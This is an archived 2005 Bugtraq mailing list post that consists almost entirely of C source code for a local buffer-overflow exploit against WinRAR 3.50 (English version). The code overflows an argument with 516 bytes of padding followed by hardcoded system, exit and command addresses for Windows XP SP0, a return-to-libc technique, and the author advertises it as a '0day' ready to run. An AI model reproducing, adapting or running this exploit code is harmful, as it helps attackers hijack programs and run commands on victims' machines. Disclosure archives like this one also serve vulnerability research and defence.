Open Source and information security mailing list archives
Message-ID: <20051015213056.5129.qmail@securityfocus.com>
Date: 15 Oct 2005 21:30:56 -0000
From: edward11@...tmaster.co.uk
To: bugtraq@...urityfocus.com
Subject: winrar 3.50 Exploit


/*

local exploit for winrar <= 3.50 ENG version


bug is 0day :)

I used the ret-2-func technique.

*/

#include <stdio.h>
#include <string.h>
#include <windows.h>

int main ( int argc, char *argv[] )
{
   long sys_addr  = 0x77C18044; // winxp sp0 targets...
   long exit_addr = 0x77C27ADC;
   long cmd_addr  = 0x77C01335;

   char buf[3000];
   char cmd[3000];
   
   if ( argc < 2 )
   {
   printf("\n * 0xLeTzDanCe - WinRAR <= 3.50 local exploit ENG version  *\n * * usage: 0xletzdance.exe <path_to_RAR>\n\n");
   exit(0);
   }

   memset(buf, 0x00, 3000);
   memset(cmd, 0x00, 3000);

   memset(buf, 0x55, 516);

   *(long*)&buf[strlen(buf)]  = sys_addr;
   *(long *)&buf[strlen(buf)] = exit_addr;
   *(long *)&buf[strlen(buf)] = cmd_addr;

   sprintf(cmd, "%s %s", argv[1], buf);
   system(cmd);

}

